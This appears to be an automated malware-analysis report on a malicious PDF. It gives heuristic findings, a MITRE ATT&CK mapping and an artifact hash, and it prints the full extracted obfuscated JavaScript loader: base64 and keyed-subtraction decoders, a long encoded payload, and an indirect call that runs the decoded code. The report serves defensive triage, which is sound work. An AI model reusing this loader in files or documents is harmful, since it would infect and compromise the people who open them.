MALICIOUS
134
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains an embedded JavaScript stream that is heavily obfuscated using String.fromCharCode. This obfuscation is a strong indicator of malicious intent, likely to download and execute a second-stage payload. The presence of JavaScript actions and embedded JS streams, along with the suspicious extracted artifact 'javascript_obj0008_000.js', supports this assessment.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
<</Type/Action/S/JavaScript/JS(\nfunction Vc5_j89\(_yM4\){var M7fp='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',HYXlt5P='',dQgdc2Nw,yOnCES,JTm2,O5d8Db8E,tvv,WoAu09Su,ijgo;for\(var noe86=0;noe86<_yM4.length;\){dQgdc2Nw=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);yOnCES=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);JTm2=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);O5d8Db8E=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);tvv=\(dQgdc2Nw<<2\)+\(yOnCES>>4\);WoAu09Su=\(\(yOnCES&15\)<<4\)+\(JTm2>>2\);ijgo=\ … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0008_000.js |
pdf-javascript-stream | PDF /JS object 8 at offset 0x230 | 5734 bytes |
SHA-256: 0cfc7c1e3513e39ee7f21e90c57b12175a9607e7704836a34bd3892b9af9cffa |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 74 of 103 identifiers look randomly generated (e.g. 'zcWt9knxvs3FrfZJ8b7Nxa3yRe26ycGp8kXtusnB') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function Vc5_j89(_yM4){var M7fp='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',HYXlt5P='',dQgdc2Nw,yOnCES,JTm2,O5d8Db8E,tvv,WoAu09Su,ijgo;for(var noe86=0;noe86<_yM4.length;){dQgdc2Nw=M7fp.indexOf(_yM4.charAt(noe86++));yOnCES=M7fp.indexOf(_yM4.charAt(noe86++));JTm2=M7fp.indexOf(_yM4.charAt(noe86++));O5d8Db8E=M7fp.indexOf(_yM4.charAt(noe86++));tvv=(dQgdc2Nw<<2)+(yOnCES>>4);WoAu09Su=((yOnCES&15)<<4)+(JTm2>>2);ijgo=((JTm2&3)<<6)+O5d8Db8E;HYXlt5P+=String.fromCharCode(tvv);if(JTm2!=64)HYXlt5P+=String.fromCharCode(WoAu09Su);if(O5d8Db8E!=64)HYXlt5P+=String.fromCharCode(ijgo);}
return HYXlt5P;}
function QL7ueTAX(A9qh2p,rA){var Kb8='',fz2W=0;for(yV=0;yV<A9qh2p.length;yV++){Kb8+=String.fromCharCode(A9qh2p.charCodeAt(yV)-rA.charCodeAt(fz2W++));if(fz2W>=rA.length)fz2W=0;}
return Kb8;}
vTaL80t7=QL7ueTAX(Vc5_j89('hK6TtnmloO2fb2t+uG+qcWJpzoh4s2hXuZt8Z7Bdp3SKdnufrWJ0iXNb72tmfJtoq7JxZHh+uG6qfmlpzohvrX1XuYl5ba5dp3eNhHmfrXOFi4lb735ziYtoq79wdXd+uHzAfWdpzol8wH5XuYt2ebBdp3afdXufrWl1i4lb73tlhZ5oq6x9aXd+uGjAanhpzoZuu25XuY9zd6xdp4WLdnyfrWmGjXNb735mdZ5oq7F9aXx+uG29b3Vpznp5sXtXuZCGbb1dp3uaenmfrWmHkIZb72p0eJBoq6x+ZIl+uG27anhpznp5sXFXuY1zarFdp3afd2efrWZ7i4lb7212eZpoq65qZnd+uGqxb3Rpznlnu2lXuZx2aKtdp3qQhm2frWSKi4lb7294dp9oq69rdXt+uGjAanhpzodmrH5XuZqGfMBdp3aQiHifrWh0jXpb725ih4loq7F+ZIV+uGqte2lpznV8rH5XuZ1zaMBdp4WaiXyfrWeFnolb72xnd5Foq7FuaYZ+uG6vfHVpznh6rm9XuZKGeqtdp4eQdm+frWSKjHVb72p4dp9oq71vaYp+uGjAb3dpznV8rH5XuZ+Jeqpdp3iOenmfrWZ7nXRb72xihY9oq7NqZIl+uGixe2lpznV8rH5XuZCJaMBdp3WMhm2frWSKi4lb73xidp9oq65+eIp+uHvAaXdpzoRqrnpXuYqJbcBdp3udhGqfrXN4i3Zb72t0e51oq698c3h+uG+waGlpznV8rW9XuYuJaMBdp4iJdHufrXeKiohb72llfIxoq69rZol+uGatanZpzoh7qn5XuYt1e6pdp4mRdXufrXaKnIdb73xihZ5oq7NraXh+uGqvbmdpznl6u2xXuZp3acBdp3madnqfrXN6n3lb72h0eptoq659ZXd+uGrAfXVpzndpu2xXuYmFZrxdp3qahGqfrXN4inZb72pze5toq6x9Z3t+uHeue2dpznZtsG1XuZB4d65dp3aec3yfrXWHnHdb725odZtoq6t6c3h+uGi/eWZpznR7vWlXuYqIeqpdp4iMiHyfrXOGkXZb7210iZ9oq799ZHx+uGisfWJpzohurH1XuZ2Fea5dp3mMdGqfrWJ7iYVb73t3eZpoq7Ftc3h+uGi/aHRpzndvvWxXuYt2d65dp4WNeWqfrWV3kHhb73tmdp5oq6x6c3h+uGi/eWZpzoRsvW9XuYmFbLxdp3iedmmfrWR7nodb73tpdp9oq75pdXR+uHqqfGJpznh4rm9XuY6Ja7xdp3SJdGufrWeKiXNb72x0eJpoq65rZol+uGqubGhpznd5qmlXuYl0aqpdp3icd3mfrWZ6iXNb72xieJJoq655ZnV+uGqtaGJpznd7rmhXuYl0arxdp3iQeHyfrWN0jolb72lkeJpoq6x+Y4iAfpzvppW4wrKkmp2sustrqNtko72Cvq3ioZ6pgbWXqKSXssC3nqRqbrXSbLHsmV2By6Rx90KkpZa1l6irp6bMt6jjpplsiW+n82dkbZS1m+6tpLJ5tZe1tTyqzrGZ7qGhsnmlrqJhrbq6tVbeo5mBx6itmnmktrq8XqNzqKXLY6zxdWK8iaZm3WiVdLx+rNuqUqW9p6i3aKp4iXNmqmhturq1VuqZq7DIpJq3raCpzKaX6p1apsO2naNzqKXLY6ndl56px4Cm27Ges7qnZOadoKvNq2Csc6ily2On83WTqL21Y6KrlaPFqKSlaKp3kWxx8JmkZNKkqO2ob7nHqKndmaKpgWVb73FifYloq7Noa3R7bHHzmaS3yYCb9K6kbNKkqO2oXrXSbHHwmaRkvLKr6KxkgYG5radoqniJc2aqaFtzuqea7HOYs8trrNuqUqfIuKTudWJ/vLKr6Kxup8i4pO5qbafIuKTuY11t1Keh4ZOVs86xqtd1q6XLtqalqJO9xbKX3nOvTs+kqJqnqKnLqaLpr2+5x6ip3ZmiqYFlW+9olXS8aKuqm2Kne2xx8aCbsL5rpfCdpKrFsq2opJeywLeetmxmfY51X/WnqKnLqaLpr12ByLmb7J6es9B+s4Ssmq3McZnppJ6lu5aq6aqXgZyyouaZlHK8sqLmnZW4nrCX46R7sr+yXvWrp6bDfVicZJ+3wH2l8J2kqsWyrfdhbcFjqavom6atyLFW6qqbss2pXqOzoLPJgKvonaWnurObolpXuYmEZrtdp3Sac3efrWKFiYRb72hzdJplX7Wuk7Z5s5fzpKGlvYCr6J2lp7qzm6KanLfAbHHinZO0u6+l3aNvssizYeqZq7DIpJq1mpuru6+l3aNvuceoqd2ZoqmBZVvvaHN0mmirqnlihXtsceKdk6i+tanjspeBi3Nx7aikpdKAnt+ZlqnLtp/0nV2svqSm3KShp8Rxot+mmbjBfq3ioZ6pgaWf4Zqes7yuZOadoKvNq3LtqKSl0myx3KGZpsWymeVjb6bCqpjmp5WvlMBA4KGesLuvpd2jb6bCqpjmp5Wvh7ar3KumtsKxnaJoXrfJtZfzYW2mxbKZ5XWUrcCloumbnXLMuJjtrKStx6peqmSUrcCloumbnXLFqKThrJpxzLOo27Fbf9Crn+adWqbFspnlZp6px6qq4mOltMukr7ZoqniJc2aqYa2mxbKZ5XWUsMimoaWanrO8rmHgoZ6wu6+l3aNtwWOwm+d1oKnQY3fsqpO9gWxx4KekbMKAZrWhbnWNc2a1oV1vgr6j36WNrbaAmOanla+Eq5vbqJSwyKahtbU8urq1Vuitn4GKdW+zcWt9knxvs3FrfZJ8b7Nxa3yRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe26ycGp8kXtusnBqfJF7brJwanyRe3HvrJuwh7Oo46amqoFlW65tYnSJqVimpqexgn6zhJ6nsry3n+mmUqu+t5/dp6Bsgr6s26pSpcu1r7eml7t5hKjsmatsgn6f4GCTtMlxmumbYIfIr6LbmmCrvrd/3aegbdS5l+xYoqXSr6XbnG+5x6ip3ZmiqYGloO2fW3/PpKiaoIm1jnNmvYZvtLq8oumZlnLFqKThrJpui36s26pStdKAZvJsYnSJc2anYJqbynhmqnuAb4m7abJhbbq6tVbzmaS3yYCr6J2lp7qzm6JaV7mSc2+qXad9iXxmnGFtvbq1qep1l77PtV7zmaS3yW+n82Fturq1Vuptc66keWvgdVp00XOZqptip4mmY6qwZnSJc2aqYWF00XdmqmhidJSppexgqKXLY6zrm4OIknmvt2htusqmh75xaL2Vs2u7on16jqlx8KmVlZ18bPNjXW3UpKjssY26yqaHvnFovbaAr9uqpbSEs5fzpKGlvX6zhK6Ttnm3i8eggKagunPvppe3vKSm32BUaYl8WKNzqazCr5uirIeRwZGYwa9gsL6xne6gbnTRd2aqaFu/zZiD4oaUi9Buc+6Nf6ynpX3xc69OzZiD4oaUi9CAWMhmVG/NmIPihpSL0H6X6qhgqMimZL2nnrC6pWThnaaNvLKkoqyHkcGRmMGvW3/WwEDbiJ65wKyk7XWTtMlxpuatmY3HtnHwmaRkzLlz6pmkt76MpO5gk7TJcazjnampy5mb7Kubs8dxqumLprbCsZ2iYWCnwaSou6xadIJsceCnpGzPpKiaoW90lKxy24ieucCspO1mnqnHqqric5tvhGyx455apamvq+GhoLe0rJOoppOxvoBzoX2Fp8uspu5fW7/PpKiapKiBupOi75+bssyen9dmqKnLtp/ppm3B1k2f4GBasM+Ac7NhrsCBa6nwdW98gmlcoqSogJZ7ZKtqW22Cvp3frJunyLFeo3OvqcW2m5qhmGzFuXO3b2B1gr6m7KGguL9rX7W1l7DMqFbjnlpsgbast3VobdW/Xu2ub4GQbF+gXlqwz39tqGljbYK+mPJgW3/WqKLtnVKtv2te5q5wgZJxZ6O0rmzFuXK3cWB2gr+yoqSogpZ7ZKtrW8DVa6LwdG98h3Rto2Gtqs6xme6hobJ5pF6js6e4wq9k6qqbss2nXqGocnWKdGeraWN1inRnq2ljdYp0Z6tpY3WKdFa0WKu90rxnq2lZcMeorZp8k7i+a1+jc69Oz6SomqBvpcmzZOqkp6uisam1nqG2gbmX7FiYgYl+nLagYLC+sZ3uoG2qhG5f9aGYbMGenNdmoKXGqHO3X3eXvLWf6qxZbdS5l+xYm4HBnpzXZqipy7af6aZtwdZNn+BgWq2Xe2Sraltqf2uftnBgdoJssd11oKnQY3fsqpO9gWxx8JmkZL2Aq+idpae6s5uiX1e5knNvql2nfYl8ZqFhbbq6tVbfdaeyvraZ26iXbLutqeFhbbvBrKLfYJZyxaik4ayagJZzrrJoYnSCvpqldZZ/1k2at5xgt86lqe6qWnSFc66yaGJ0hqhk5p2gq82rX7WeobaBqXOqc5iAi3xmqnOYb4Rssd2TmKGWp2Hfc69OumtftZlabZS3qPOzpqzCtmTnnZatunGk36+CsLq8m+xgoLnFr1+1tZWlzaaeop1bv9ZNl6JhbcHW'),this.producer);CWbv13=this.author;hwb1=this[CWbv13];hwb1(vTaL80t7);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.